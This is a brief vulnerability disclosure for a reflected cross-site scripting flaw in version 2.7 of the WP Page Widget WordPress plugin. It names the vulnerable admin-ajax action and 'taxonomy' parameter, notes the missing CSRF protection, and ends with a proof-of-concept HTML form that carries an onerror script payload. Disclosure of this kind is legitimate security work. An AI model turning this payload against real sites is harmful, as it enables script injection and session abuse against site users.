Hello,

Plugin: WP Page Widget 2.7 https://wordpress.org/plugins/wp-page-widget/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection)

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=pw-get-taxonomy-widget

Vulnerable parameters: taxonomy

Example PHP callstack:

pw_returnTaxonomyWidget   [/wp-page-widget/wp-page-widgets.php:862]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=pw-get-taxonomy-widget" />

<input type="text" name="taxonomy" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--